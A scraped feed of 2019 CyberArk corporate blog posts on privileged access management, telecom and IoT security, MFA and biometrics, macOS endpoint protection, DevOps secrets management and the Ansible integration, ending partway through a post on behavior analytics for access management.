This probably explains why security solutions deployed as a service are surging in popularity. They provide customers with risk mitigation solutions that don’t require managing additional infrastructure and offload a lot of the hands-on management that’s required with on-premises solutions. SaaS models allow organizations to offload the majority of the work of managing infrastructure, handling upgrades and free IT security staff up to concentrate on risk and compliance. PAM is no different from other SaaS or security solutions being deployed as a service.

PAM as a Service is a critical initiative for organizations that simply don’t feel they have the resources to deploy and maintain an on-premises PAM solution, or if they would instead like to allocate precious internal resources elsewhere.

By implementing PAM as a Service, organizations can have all the benefits of a strong PAM implementation without burdening their IT teams with managing additional infrastructure or doing upgrades. These organizations also gain the additional benefits of SaaS. This includes moving to an OpEx model vs. CapEx model for their PAM software expenditures.

CyberArk Privilege Cloud helps to meet organizational needs for the fundamental capabilities of securing privileged access without requiring additional infrastructure management. CyberArk’s PAM as a Service offering provides organizations with the ability to discover, onboard and manage privileged accounts and credentials in on-premises, cloud and hybrid environments all from an easy to deploy and manage cloud computing solution.

Privilege Cloud is also able to isolate credentials and prevent them from reaching end user workstations. It records and monitors sessions to protect sensitive information and systems, helping organizations meet audit and compliance requirements.

 

CyberArk Cloud-Based Enterprise Privileged Access Security

Privilege Cloud dramatically cuts the amount of time needed to deploy. This allows any organization to quickly move PAM from their “wish list” to their “done list.”

Leaning on its expertise as a trusted adviser to organizations of all sizes, CyberArk has created the CyberArk Privilege Cloud Guided Success Plan to help organizations not only quickly reduce risk, but also stay secure when deploying PAM as a Service. The Guided Success Plan is tailored to meet the most critical needs of each organization.  It follows a three phase approach that can be scaled and repeatedly applied.

PAM as a Service is a great way for organizations to quickly secure their critical resources and systems without the need to manage additional infrastructure. Learn more about why your organization should prioritize Privileged Access Management as-a-Service today!

 

]]>
With 5G and IoT, It’s a New Day with New Risks https://www.cyberark.com/blog/with-5g-and-iot-its-a-new-day-with-new-risks/ Thu, 24 Oct 2019 13:00:17 +0000 https://www.cyberark.com/?p=76133 5G and Internet of Things (IoT)

Connected devices and smart technology — often referred to collectively as the Internet of Things (IoT) — are present in every aspect of our lives today: at home, school, work and on the go. Constant connection provides opportunities for innovation and modernization. But, it also opens up potential cybersecurity threats that can compromise your most important personal information.

October is National Cybersecurity Awareness Month (NCSAM), and this year’s theme is “Own It. Secure It. Protect It.” Today we’ll take a look at “Own It.”  This sub-theme focuses in on topics like IoT, social media and online privacy.

For this particular blog, we’ll examine cybersecurity in the telecommunications sector. We’ll highlight the challenges this industry faces in keeping your devices and information safe and secure.

CSPs and the Opportunity for Disruption

For communications services providers (CSPs) specializing in mobile services, media or web services, the only constant is relentless innovation. Staying competitive and relevant requires CSPs to deliver business value beyond basic connectivity. While these factors undermine established business models, they also open up lucrative new markets and opportunities for incumbent players. Consider a couple trends and market forces surrounding CSPs today:

  • The Internet of Everything. Smart cities and infrastructure, connected vehicles, digital healthcare, smart homes and more are transforming markets.
  • Transformational mobile bandwidth is coming online at the same time that the IoT is reaching critical mass. The impending disruption will be massive.
  • Over the Top (OTT). OTT entities are content providers that distribute messaging and streaming media overthe internet. Years after Yahoo! Messenger and AOL’s AIM came and went, they keep finding new ways to undermine CSP business models. Just look at Tencent, parent company of WeChat, who currently has a market cap of $397B (compared to Verizon’s $250B). Or consider the meteoric rise of OTT streaming players like Netflix and Hulu.
  • Cyber Attacks. Telecom companies are frequently targeted by cyber attacks because they build, control and operate critical infrastructure that is widely used to communicate and store large amounts of sensitive data for consumers, businesses and government. Data breaches or denial of service attacks on CSPs can reverberate far beyond the initial incident. Moreover, end user equipment—home routers, smartphones, IoT devices and more—are only nominally under CSP control. This makes them easy to compromise and ideal targets for hackers looking to steal data.
  • Privacy is Paramount. In a stiffening regulatory environment, data privacy is a higher priority than ever before. Since prominent communications brands have been implicated in major data breaches, CSPs recognize the need to embrace trust as a competitive differentiator.

For consumers, the dramatic expansion in bandwidth and connectivity that will come with 5G technologies and emerging IoT models will likely mean more options for engaging with media.  It will also present new opportunities for both media providers and network operators. There’s no doubt that it’s an exciting time in the telecommunications sector.

CSPs are positioned to enable these new business models. Of course, like with any great innovation, CSPs can’t just sit back reveling in the uptick in revenue. They still need to be mindful of the risks inherent in the data economy and work to secure their customers from them.

Operational and Security Challenges in Telecommunications

The many, varied and expanding vulnerabilities in telecommunications infrastructure present a number of risk factors that are potentially far more harmful than the typical privacy breach at a retailer, bank or other consumer-oriented organization. Bad publicity, brand damage and regulatory fines can be very costly. However, a cyber attack on a telecom company has follow-on impacts that most others don’t.

Think about it.  Telecommunications systems serve as a critical backbone to nations and economies across the globe, which makes network security critical. In addition, network operators typically maintain extraordinarily diverse legacy equipment infrastructure. They use servers, switches, access points and network interfaces from a variety of different manufacturers.

Every day, these systems enable the transmission of financial and business transactions as well as emergency response communications. If compromised, the consequences can be dire.

Privileged Access Management: The Key to Protecting Critical Infrastructure

Privileged credentials exist everywhere. Attackers know this. That is why almost all advanced attacks today rely on the exploitation of privileged credentials to reach a target’s most sensitive data, applications and infrastructure. Telecommunications is no exception.

Yet, too often, privileged access to critical systems is left unsecured and unmanaged. This puts assets at an increased risk of a damaging cyber attack that could impact telecommunications companies and citizens alike.

 Privileged accounts and credentials provide superuser access to critical telecommunications infrastructure on-premises, in the cloud and in hybrid environments. To reduce the risk of costly, disruptive damage to these systems, it’s vital that companies proactively secure, control and monitor the use of powerful privileged accounts. Remote desktop protocol (RDP) and Virtual Network Computing (VNC) credentials, in particular, provide cybercriminals with a way to both gain initial entry into networks and move laterally. This is an essential process for identifying the systems where malicious software will be most effective.

So, how can telecom companies proactively reduce the risk of privileged access abuse?

  • Understand the most common types of attacks that exploit privileged access. How does an attacker think and behave in each case to exploit the organization’s vulnerabilities?
  • Prioritize the most important privileged accounts, credentials and secrets. Identify the potential weaknesses and vulnerabilities in their existing privileged access management (PAM) program. Focus especially on those that could jeopardize critical infrastructure or organization’s most vital information.
  • Determine the most effective actions to close the gap on these weaknesses and potential vulnerabilities. Which actions are the highest priority? What can be achieved quickly and which require a longer-term plan?
  • Continually improve by taking the time to plan out a strategy for managing privileged access. Return to reassess the strategy as your organization and the threat landscape evolve.

To learn how to create an action plan for securing privileged accounts, credentials and secrets in telecommunications environments, download our eBook, Secure Telecommunications in the Age of 5G and the IoT. And watch this space, where we’ll soon cover our final NCSAM topic, “Protect It.”

]]>
Open and Open Source: A New Community for All https://www.cyberark.com/blog/open-and-open-source-a-new-community-for-all/ Mon, 21 Oct 2019 13:00:16 +0000 https://www.cyberark.com/?p=75986 Open source Community, Open Source Project

Open source has fundamentally changed software development. It’s taken the burden off individual businesses struggling to build or buy everything they need. It’s shifting responsibility for the development process to a broader, interconnected ecosystem of individuals and businesses that can collaboratively tackle mutually beneficial projects. The spirit and passion of the open source community inspired us to create a forum to encourage open access and improved collaboration across our business.

With that in mind, today we are thrilled to unveil CyberArk Commons—a new open community for developers, engineers and security professionals to discuss open source projects, DevOps, and the latest cybersecurity research from the CyberArk Labs team. We already make CyberArk Labs and product documentation easily accessible and available to all.  Now we take it to the next level with CyberArk Commons to encourage dialogue and active engagement.

We invite all of our readers to visit CyberArk Commons—there’s something there for everyone:

  • Connect. Come and engage with likeminded peers and subject matter experts. Learn about a variety of topics from the CyberArk Conjur secrets management solution and other DevOps security tools to the fast-growing CyberArk Marketplace, which features a wealth of community contributions.
  • Contribute. Share content, code and ideas on the CyberArk Commons discussion forum to help the collective community address evolving security challenges.
  • Learn. Explore technical content and insights on top-of-mind open source topics written by the engineers and practitioners like you who know them best.
  • Build. Experience the latest open source tools and approaches from the CyberArk Commons community. Share ideas, give feedback and help make great solutions even better!
  • Anticipate. Arm yourself with the latest technical research and open source cybersecurity tools from CyberArk Labs and Red Team security experts to help you think like an attacker and proactively stay ahead of the latest threats.

CyberArk Commons is open to all, whether you’re a current customer, partner, member of the technical community or are just starting to get interested in privileged access management. Connect and engage with peers and subject matter experts on CyberArk products and services. Explore DevOps and open source and discuss new research with the members of the CyberArk Labs team.

Visit CyberArk Commons today to start contributing to important industry dialogue and solving cybersecurity challenges faster and smarter together!

To learn more about open source and CyberArk Commons, visit the CyberArk Conjur blog.

]]>
MFA and Biometric Authentication: Secure the Digital Profile https://www.cyberark.com/blog/mfa-and-biometric-authentication-secure-the-digital-profile/ Thu, 17 Oct 2019 13:00:55 +0000 https://www.cyberark.com/?p=75909

Every October, National Cybersecurity Awareness Month (NCSAM) promotes the importance of cybersecurity and helps available resources be safer and more secure online.

This year’s NCSAM theme is “Own It. Secure It. Protect It.” The theme emphasizes the role each individual person plays in online safety and the importance of taking proactive steps to enhance cybersecurity both at home and in the workplace.

Over the next few weeks, we’ll explore each of these three core components — beginning with “Secure It.”

When It Comes to Securing Your Digital Profile, MFA Is Table Stakes

Cybercriminals are very good at getting personal and sensitive information from unsuspecting victims. As technology evolves, their methods have become increasingly targeted.

Technology users have a responsibility to protect against cyber threats by learning about the available security features on the devices and in the software that you use. It’s also critical to utilize multiple types of authentication — not just a password — to protect your devices and online services such as bank accounts, email and social media accounts.

Typically, this begins with implementing multi-factor authentication (MFA), a security mechanism in which individuals must present two pieces of identity verification when logging into an account. In most cases, MFA includes a password and some kind of authentication on the user’s mobile device — SMS is the most common. Using MFA means that even if a cyber attacker manages to figure out your super strong password, they still would not be able to gain access without the other piece of authentication.

According to Microsoft research, utilizing MFA makes your accounts 99.9 percent less likely to be compromised. It’s an important cybersecurity best practice that doesn’t take much effort to implement. Unfortunately, however, motivated cyber attackers are always discovering potential work-arounds. Recent headlines reveal that while MFA is a critical step, it is also a target.

Overcoming Blind Spots in MFA with Biometric Technology

Earlier this month, the FBI issued a warning stating that it has “observed cyber actors circumventing multi-factor authentication through common social engineering and technical attacks.”

As more people implement MFA as an additional layer of cybersecurity protection, attackers are turning their attention and efforts toward exploiting blind spots inherent in MFA. Consider that MFA typically relies on “something you know,” (e.g., a security question) and “something you have,” (e.g., a laptop or smartphone). Here’s the problem — nothing about either of these methods actually confirms identity. Something you have can be stolen and something you know can be learned.

The attack on Twitter CEO Jack Dorsey is an example of how attackers can exploit these MFA blind spots. In late August, Dorsey’s personal Twitter handle was compromised. Nearly two-dozen offensive tweets and re-tweets were posted before the content was removed. The social media attack was just one in a series of Twitter account takeovers targeting a string of celebrities and social media influencers.

The attack method, known as a “SIM swap,” is accomplished when an attacker either convinces or bribes a mobile carrier employee to switch the number associated with a SIM card to another mobile device. According to the New York Times, these switches often cost as little as $100 for each phone number.

After the switch is made, the attacker can intercept any MFA codes sent by text message and essentially take control of the user’s entire phone number. This allows the attacker to gain access to everything from a person’s social media to banking, email and even cryptocurrency accounts. Some attackers are even using this SIM swap method to target and compromise high-profile politicians, causing reputation damage and spreading misinformation.

So how can you protect yourself? The FBI is urging individuals and organizations to continue using MFA and also to take security one step further by adding biometric authentication. This will make it harder for attackers to trick users into disclosing MFA codes or use technical interception to create them.

Biometric authentication uses biometric identifiers such as fingerprints, iris scans and voice patterns, for identification and access control purposes. These biometric identifiers are completley unique to the individual. As an individual, you can easily activate biometric functionalities already available on your devices and use them for authentication purposes.

There is no silver bullet for cybersecurity — it takes a strong mix of technology and security best practices to protect yourself and your organization in the digital era. The FBI’s guidelines around MFA and common-sense biometrics applications are spot on — as both are integral components of a multi-layered security approach. (This is sometimes referred to as Zero Trust for enterprise organizations).

Don’t wait until it’s too late. Take action this Cybersecurity Awareness Month and “Secure It” by applying these important layers of security to your devices and online accounts.

 

]]>
How to Implement Successful Endpoint Security for macOS https://www.cyberark.com/blog/how-to-implement-successful-endpoint-security-for-macos/ Wed, 16 Oct 2019 21:08:50 +0000 https://www.cyberark.com/?p=75891

The belief that there are no viruses or types of malware for macOS goes back to the beginning of Mac OS X at the very beginning of this millennium. Unfortunately, this is a myth.

The number of Mac users infected by malware and other Mac threats has grown exponentially since 2010. We see large numbers of people infected with Mac threats every day on a much larger scale than even just a few years ago. Macs are a growing presence in enterprises and it’s the perfect time to stop treating them as exceptions to desktop and laptop security policies. Security and risk management decision-makers need to understand the potential security risks for Macs and to follow best practices to secure macOS endpoints.

Furthermore, macOS has become more popular among developers, making any form of ransomware targeting macOS an even bigger danger. To do their job, developers need to have access to source code, API keys and other shared secrets – making developers the kind of user that attackers target. If macOS is going to be a standard for developers, then it is more important than ever to be able to secure it.

One reason why Macs have become so popular among developers is that Linux and MacOS share the same “operating system ancestor” Unix. Since the majority of web servers use Linux to run the web applications, macOS has advantages as a development platform. Developing on Macs involves a lot of programs and concepts that are applicable when deploying, operating and managing production web servers in Linux. This isn’t likely to change anytime soon, so developers are going to continue to want to work on macOS, making securing macOS a long term priority.

With the risk of malware attacks on macOS, it is becoming increasingly necessary for Mac users to have an additional layer of security and, in particular, to have something effective against different attack vectors.

How Do I Prevent Ransomware Attacks on my Mac?

Macs are not bulletproof. No macOS security update is going to be able to counteract all possible security threats. MacOS users need to get in the habit of using cybersecurity best practices to keep their endpoints safe.

Don’t assume that the best practices that keep Windows machines safe from ransomware aren’t just as vital for Macs. In fact, keeping Macs safe from malware and ransomware isn’t all that different from securing a Windows machine. Think layered security and good endpoint protection.

  • Keep Mac computers up-to-date. Outdated software is like rotted wood: weak and full of holes. Updates can plug these holes and make it harder for malware to find a way in. So, be sure to update both the operating system and apps often.
  • Be careful what users install or click. We should all know this by now. If a user gets an email from someone he doesn’t know – or a suspicious email from someone he does – he shouldn’t open any attachments or click any links. That’s how infections start.
  • Install apps only from official sites or the Mac App Store. Don’t let users install software from sources that haven’t been vetted. It’s too risky, because they can never be completely sure of what they are going to get. Torrented software could be bundled with various types of ransomware, for example. It’s safer to stick to official websites or the App Store.
  • Make frequent backups. It’s important to back everything up to an external disk, which is then disconnected from the Mac. This way if the Mac gets hit with ransomware, it won’t be able to encrypt the unattached backups. Once the ransomware is safely removed, it’s time to run a full scan to make sure nothing was left behind before reconnecting the backup drive and recovering files.
  • Use anti-virus. Since Macs are not immune to malware and Mac-targeted attacks, anti-virus software can help protect Macs against viruses, malware, rootkits and other signature-based attacks. However, it isn’t enough on its own to ensure complete safety. Malware and anti-virus protection need to be a part of a larger package of security deterrents.
  • Remove admin rights. Limiting administrative privileges is key to protecting any operating system from ransom attacks and other malware. Keep in mind the principle of least privilege – no one should have access they don’t need and no one should keep access longer than they need it. To do this, run non-elevated users and allow privilege elevation only on approved applications and for approved users. Make sure to utilize application control.

MacOS users have been hearing for years that all the security they need comes built-in. Once an organization figures out it needs to move beyond that with macOS security, it’s easy to assume that installing anti-virus and reminding users not to click questionable links is enough. But, organizations need more than anti-virus software and common sense to stay safe. Comprehensive, proactive privileged access management (PAM) is key to any cybersecurity strategy.

CyberArk is the global leader in privileged access management and CyberArk Endpoint Privilege Manager can help organizations take their endpoint security to the next level – whether they use Windows, macOS or any other operating system.

Learn how you can extend your existing privileged access management program with a free trial of CyberArk Endpoint Privilege Manager.

 

]]>
How to Evaluate Your DevOps Secrets Management Program https://www.cyberark.com/blog/how-to-evaluate-your-devops-secrets-management-program/ Tue, 08 Oct 2019 13:00:42 +0000 https://www.cyberark.com/?p=74989 DevOps Secrets Management Program Evaluation

Editor’s Note: Part 5 of a 5-part series providing practical guidance and insights to security leaders for securing DevOps environments. This series is based on insights from Global 1000 CISOs.

Over the past several months, we have mined the real-world experiences of CISOs from Global 1000 organizations to learn how to meet the challenges of securing DevOps. We’ve explored a number of actionable steps security teams should take to align themselves to DevOps culture and methods while addressing the risks of privileged access. We covered:

  1. Five key steps for bringing DevOps and security teams into alignment
  2. How to prioritize DevOps tools and cloud infrastructure
  3. How to establish enterprise requirements for DevOps
  4. Four things security can do to keep up with DevOps CI/CD
  5. Evaluate the results

 In our final installment of The CISO View blog series, we’ll outline best practices for evaluating the results of a DevOps secrets management program. These recommendations can help security teams showcase early successes, home in on areas that require additional efforts and ensure continuous program refinement.

Like all enterprise-wide cybersecurity programs, rolling out a secrets management program typically happens through a phased approach of incremental improvements tightly aligned with DevOps culture. For example, to start, teams can identify and prioritize securing a finite set of build pipelines, applications, databases or other resources with access to sensitive data, by ensuring that the privileged credentials to access them are managed by the centralized secrets management system. Types of sensitive data include regulated data (covered by GDPR, HIPAA, SOX or PCI), proprietary financial data or intellectual property. This incremental approach can both help security teams achieve “quick wins” to demonstrate security and efficiency gains to key stakeholders, while also establishing a path for a broader roll-out to extend the reach of the program.

 Test the Deployment of Your Centralized Secrets Management System

In testing the efficacy of your secrets management system, there are four key areas to evaluate. 

  1. Developer experience. Developers should be able to use their own machines for testing and then smoothly promote the code to the production environment. It’s important to evaluate if developers can easily find and use well-documented code modules for handling secrets. Additionally, can they test their code for secrets retrieval in their preferred environment?
  1. Failover. If a call to the credential vault does not reach the master system, it should fail over to a second system. Does your program include a robust failover system for the retrieval of secrets?
  1. Scalability. For an enterprise-wide deployment, the secrets management system may need to scale across many thousands of application instances and multiple data centers. Is your system able to handle the scale your organization requires today – and down the road?
  1. Break-glass capability. In circumstances such as networking issues that make secrets inaccessible from the centralized system, it’s important to ensure that remote sites aren’t locked out. Do you have a secure mechanism that can provide temporary access to secrets when the centralized site is not reachable?

Measure Improvements in Risk Reduction and DevOps Practices

It’s also important to establish and track metrics to gain visibility on attack surface coverage and the effectiveness of privileged access. Evaluate the following areas to influence those metrics: 

  • How many secrets have been secured for tools and applications? (It’s important to have a plan for extending this program to secure more secrets over time?)
  • How capable are you of detecting if privileged credentials are being misused?
  • According to penetration tests or Red Team exercises, are your secrets becoming increasingly secure against attackers?

Some organizations provide scorecards for each DevOps team to measure how well their practices comply with security requirements. These scorecards could measure:

  • If any of your secrets can be found in code repositories on the Internet?
  • What percentage of code commits contain a secret, such as a cloud access key?
  • How many secrets are there per line of code?
  • How often is the secrets vault being used? (If you’re not tracking many transactions after secrets are vaulted, there’s a chance that the DevOps team may be bypassing the process.)
  • Are unique credentials being used where “uniqueness” is mandated?

In addition to measuring these improvements, it’s important to help internal and external auditors understand the security controls in place for protecting your organization’s DevOps and cloud environments. They may not be familiar with the newer tools, techniques and automated methods that the security team is implementing. To ensure their compliance assessments are accurate, auditors need to be kept up-to-date.

One of the report contributors said it best: “DevOps is a game changer. People are starting to recognize that you can’t do it without security.”

For organizations embarking on digital transformation initiatives, it has never been more important to align security and risk postures across new tools and technologies. We hope this CISO View series has inspired you to examine your own programs and commit to driving deeper developer collaboration, more effectively assessing risk and prioritizing steps to protect DevOps processes while maintaining developer velocity.

To learn more, we encourage you to download The CISO View report in its entirety, watch a brief highlights video and tune-in to our on-demand webinar.

]]>
AnsibleFest: CyberArk Presents Ansible Tower Integration https://www.cyberark.com/blog/ansiblefest-cyberark-presents-ansible-tower-integration/ Thu, 03 Oct 2019 16:39:15 +0000 https://www.cyberark.com/?p=74768 CyberArk on display at AnsibleFest

Several members of the CyberArk team recently returned from AnsibleFest 2019, a four-day conference focused on Ansible, Red Hat’s open source automation management platform. Brandon Traffanstadt, Global Director for Solutions Engineering, and DevOps Security Guru Joe Garcia attended the conference in Atlanta. At AnsibleFest, they delivered presentations on integrations with Ansible’s new security automation platform, highlighting a number of CyberArk integrations with Ansible solutions. There was a lot of interest in the new integration that provides Ansible Tower users with an easy to use menu option to select CyberArk to secure, manage and rotate the secrets used by Ansible Tower.

Right after the event I was able to catch up with Brandon and Joe to ask each of them how the conference went…

What did you present on at AnsibleFest?

BT: The area my talk focused on was CyberArk’s integration with Ansible Security Automation.

The integration between CyberArk’s secure platform and Ansible Security Automation allows organizations to programmatically respond to environmental changes as well as input from other security solutions. For instance, if something out of the ordinary happens – like Joe clicking on a malicious funny cat video– it could trigger a company’s email security system to flag him as being a compromised user.

Once Ansible receives this information, it could then take proactive action to disable this user or require a password change, even going as far to change the security policy by requiring additional authentication or approval to use any privileged accounts that he had access to within CyberArk. The Ansible Security Automation with CyberArk helps automate incident response around an organization’s most privileged assets.

Presentation on CyberArk integration with Ansible Security Automation.
Joe Garcia presents on CyberArk’s integration with Ansible Tower.

JG: What I spoke about in my talk is that, in the most recent version of Ansible Tower – version 3.5.1 – Ansible introduced the idea of a secrets management system. What that essentially means is that Ansible Tower has a credential store where it will encrypt at-rest secrets that you need in order to log in to the remote host, the private key that’s needed to log in, things like that.

People need secrets in order to log in and then configure a remote resource. Ansible always had a built-in way to do it, but this created a security island. When you don’t centralize all that management and auditing, it becomes a lot harder to maintain. That’s where our secrets management integration comes in. Instead of having the secrets stored in Ansible Tower itself, it redirects any attempts to get credentials from Ansible Tower to our backend, through the CyberArk Privileged Access Security Solution.

The integration creates secret look-ups in Ansible Tower with the relevant information that’s needed in order to make the connections back to the CyberArk solution. Then you can start to create machine credentials, Amazon Web Services credentials and different types of cloud credentials. Instead of having the information in Ansible Tower, the integration will grab those credentials just-in-time from CyberArk. Then it will provide that securely into the playbook and connect to the machine securely. This allows you to start getting that centralized management rotation.

You’re staying within compliance now. You’re not changing things or breaking automation. At the same time, we get to audit all the access throughout the different nodes in Ansible. People are really starting to like the fact that they don’t have to manage secrets separately in Ansible Tower anymore. They have CyberArk to go to as a central source.

What kind of reaction did you get?

JG: Compared to past events, I’d say one of the biggest changes was the interest and enthusiasm around security and automation.

This year for my talk I had a packed room with more than a hundred people all interested in learning about how to deal with security at inception using Ansible with CyberArk and secrets management. The conversations I had with attendees afterwards really reinforced the impact we can have on how companies approach security.

AnsibleFest Booth: learn about secrets management
AnsibleFest attendees visit CyberArk’s booth to learn about the CyberArk approach to secrets management.

BT: The single biggest piece of feedback I received from the conversations we had at the booth and outside the booth was that folks at AnsibleFest are interested in learning more about secrets management and CyberArk’s approach. There’s a lot of thirst for education happening in the market right now.  It’s an exciting time to be in this space.

For example, automation developers were really interested in hearing about CyberArk’s integration with Ansible Tower. One of the problems people were having is that secrets rotation, a requirement that is being mandated in many cases by their security teams, is manual in Ansible Tower. This makes it hard to make sure that the credentials are getting rotated when and how they should be. If you’re not using Tower, this means that you’d potentially have to go out and update playbooks, scripts and other artifacts after every rotation cycle, which is pretty much a terrible way to spend a few afternoons.

IT managers were really surprised at how much easier credential rotation was with CyberArk handling it. Attendees working for companies that already leverage CyberArk for Privileged Access Management were also very interested to hear about the integrations with Ansible that are already part of the core solution—from using Ansible to deploy elements of the platform to leveraging the CyberArk collection within Galaxy to automate  tasks — like secrets onboarding – within CyberArk.

It’s a really exciting time. There’s so much more follow-up we can do after hearing, “Oh man, I would really love to learn more.”

What’s next?

If you weren’t able to make it to Atlanta this year for Brandon and Joe’s talks, stay tuned as we are scheduling a follow up webinar to help security teams enable their automation focused developers and IT staff leverage CyberArk to secure their Ansible environments. You can also discuss the Ansible integrations in the new CyberArk Commons discussion forum and access the CyberArk /Ansible integrations in the CyberArk Marketplace and on www.conjur.org. If you’re in Chicago, we’re planning a half day workshop with Ansible later this year. Contact sales@cyberark.com for additional information.

]]>
Comparison of User Authentication Methods on Three Parameters https://www.cyberark.com/blog/comparison-of-user-authentication-methods-on-three-parameters/ Thu, 03 Oct 2019 14:12:16 +0000 https://www.cyberark.com/?p=98962

Evaluating user authentication methods based on usability, security, and deployability.

A plethora of user authentication methods exists today to distinctly identify a given user (or another entity such as a system). It all started with the humble password. These days, systems like Apple’s Face ID use a cutting-edge combination of sensors and neural networks to make the experience seamless yet extremely secure for end-users. It may not match the human brain’s identification mechanism yet – a person can detect an acquaintance by face, voice, walk, etc. – but it’s getting pretty close for sure!

Every user authentication method can generally be evaluated using the following three key parameters:

  1. Usability: How natural and hassle-free is it for the end-user to use this authentication?
  2. Security: How difficult is it for a malicious actor to trick the authentication?
  3. Deployability: How easy is it to deploy for all users across platforms, devices, geographies, etc.? An important consideration is whether the use case is B2C or B2E, meaning whether the end-user is a consumer or an employee.

Also, there are broadly three categories of user authentication methods:

  1. Something You Know: A shared secret like a password or secret question. Usually these are easiest to deploy across all devices and platforms, but not very secure as they are easy targets for phishing and other hacks.
  2. Something You Have: Another device such as a FIDO compliant key. Usually these are very secure from phishing and other hacks, as the private key never leaves the authenticator device. They are, however, prone to physical thefts and not easy to use in B2C scenarios, as a consumer usually doesn’t own special authenticator devices.
  3. Something You Are: These are basically biometric methods like a fingerprint or facial recognition. These are usually the most natural to use for end-users but depend very heavily on the underlying device or platform. They are clearly the future, but only if all platforms use secure hardware and software, and can play well with each other! They also almost always need a backup mechanism (for example, what if you cut your finger?) but this presents an Achilles heel, as the backup mechanism can potentially be targeted by an attacker.

Now that we understand the broad taxonomy of user authentication methods, here is a tabular view of some of the most popular authentication methods with scores for each of the three parameters. Please note that these scores are meant to be simple relative indicators to broadly understand the relative strengths and weaknesses of each method.

Authentication Methods

Category

Usability

Security

Deployability

Comments

Apple Face ID

SYA

9

8

2

Secure and easy to use, but only useful on some Apple devices, not very interoperable across apps.

E.g. doesn’t yet support a standard like FIDO2, isn’t even supported yet on Macbooks.

Face Recognition

SYA

9

7

2

Generic face recognition – inconsistent security, heavily depends on device hardware and software.

E.g. security of Android face recognition depends heavily on the device brand.

Fingerprint Recognition

SYA

7

7

4

Generally secure and more deployable than face recognition, getting more deployable every year. Pretty much all smartphones have a decent enough fingerprint scanner.

FIDO 2 U2F

SYH

6

7

3

Only meant as a strong second factor, depends on compatible devices such as Yubikey, so widely used in B2E use cases but cannot be used in B2C.

FIDO 2

SYH

6

8

3

Leverages biometric authenticators and is trying to make them interoperable across devices by working with all industry players, but has some time to mature in terms of support.

SMS OTP

SYH

3

5

8

Not very secure as prone to SIM swap attack, but is heavily used as the second factor in B2C scenarios, as every user has a smartphone.

OATH OTP (Soft Tokens)

SYH

3

8

5

Quite secure, but needs an Authenticator app and the user needs to know how to set it up. It could be useful if the end-user is tech-savvy, usually B2E scenarios.

Passwords

SYK

4

3

6

The most ubiquitous because of history and deployability has well known issues in security. All security professionals want it to go away as soon as possible.

Secret Questions

SYK

5

2

7

Arguably worse than passwords, especially in the age of social media as lots of information of users is publicly available.

Personal Info

SYK

6

0

8

Asking personal information such as DOB is a horrible method in the age of social media. It should not even be listed as an authentication method, but I have seen some services using it.

Email OTP

SYK

4

5

7

A decent method for B2C scenarios like SMS and doesn’t depend on another device but relies heavily on the efficiency and security of the email service of the user.

SYA – Something You Are; SYH – Something You Have; SYK – Something You Know

If we plot these scores on a bubble chart, with the size of the bubble representing Deployability, Security on Y-axis, and Usability on X-axis, it would look something like this:

bubble chart

Comparison of User Authentication Methods on 3 parameters – Security, Usability, and Deployability
Size of a bubble indicates Deployability of that authentication method

Looking at this, you can easily see that in most situations a single user authentication method cannot be your silver bullet. That’s where intelligent adaptive MFA comes into the picture. It can decide when and whether to use a second factor, preferably from a different category than the first factor depending upon security policies or even patterns of usage analyzed by machine learning. This enables the security admin to cherry-pick the best combination of Security, Usability, and Deployability.

One must also consider the nature of end-users. A typical deployment for the B2E use case (end users are employees) may use certificate-based ZSO for most normal cases and add a second factor such as FIDO2 authentication. A typical deployment for B2C use case (end users are consumers) may use biometric if the device allows it, password as a fallback mechanism if the device doesn’t have it, and an SMS OTP as step-up authentication for important transactions, such as money transfer.

]]>
Simple Rules for Smart IAM Solutions. – Part 2: Contexts & The Data Science Behind https://www.cyberark.com/blog/simple-rules-for-smart-iam-solutions-part-2-contexts-the-data-science-behind/ Wed, 02 Oct 2019 17:40:44 +0000 https://www.cyberark.com/?p=99387

Part 2 in a series on understanding how to evaluate IAM solutions – let’s dive into contexts and data science!

In my last blog we covered the basic rules that can be used to evaluate IAM solutions that leverage User Behavior Analytics (UBA) and Machine Learning to adapt to risk. As a refresher, here are the four rules of thumb, which we briefly covered in that blog post:

  1. The more contexts the tool is able to collect data from, the more the fidelity and reliability of the tool. If you have garbage going in, you will have garbage coming out.
  2. Automation is key: how efficiently and seamlessly the tool stitches data and processes coming from various sources for the various contexts.
  3. Automation goes hand in hand with Orchestration: how well the tool is able to interact with other tools and workflows.
  4. UBA based continuous authentication must lead to better end user experience!

In this blog we’ll dig deeper into the first rule, which is all about collecting data from the right sources and then leveraging data science to pick the right features and transformation techniques. The ultimate goal is to design a solution which leverages UBA to detect risk and further bolster access security, and as we discuss these topics, you will very quickly realize that the entire process is as much an art as it is science and that it will vary from domain to domain and dataset to dataset. So, let’s dive in!

Identifying Contexts

From a view of thirty thousand feet, the world of access may seem very simple and straightforward, in which an entity tries to access a resource that may be on-prem or in the cloud. Everything else is not apparent in the beginning until you start zooming in and analyzing the impact of some of the other components at play and how they impact the riskiness of a given access session for a particular user<->resource combination. Let’s try to zoom in and identify some of the other parts of the puzzle, which help with the stitching of the many moving parts and coming up with a model for collecting an optimized set of data and establishing users’ behavior profiles. These profiles can then be augmented with additional intelligence sources. Subsequent user actions and behaviors can then be compared against their profiles for anomalous activities and determining risk. The figure below tries to capture an over-simplified version of the whole process:

Image1

Getting Data!

Getting the right data drives the various contexts needed to help put the pixels together to identify the behavior profiles of the subjects. Let’s start with the obvious question of “how could we define a user”? This is where asking the right questions starts to matter and where art and science start to converge.

  1. Is this about a B2E (aka workforce)/B2C/B2B use case? For this blog, let’s assume that this is for the workforce use case
  2.  What’s the nature of the workforce in terms of geographical distribution, remote vs office employees?
  3. What kinds of resources are being accessed and protected by the access management (AM) solution?
  4. What kind of policy does the enterprise have for mobile devices and end points in general? (For example, BYOD or not?)
  5. How does the enterprise grant network access to on/off-prem apps? At what layers are various network and app perimeters protected?
  6. Is the enterprise employing the services of a CASB to monitor fine grain aspects of access to apps in the cloud?
  7. Does the enterprise have DLP solutions in place to detect and prevent data leak, knowingly or unknowingly by malicious or compromised users?

And so-and-so-forth. You get the drift.

More importantly, why we are asking these questions? The answer, in terms of Data Science, is to help us extract the right features from a given dataset and to derive the various characteristics of the dataset. So, let’s try to slice and dice those questions.

Question one will help in gauging the scale of a typical dataset that would go into determining the size of the training set and extract mathematical distributions for the various access events such as log in activity, app launch activities, common factors etc. It is always a best practice to get a healthy dataset and then analyze for distributions and other statistical tests such as the normality test etc.

image2

 

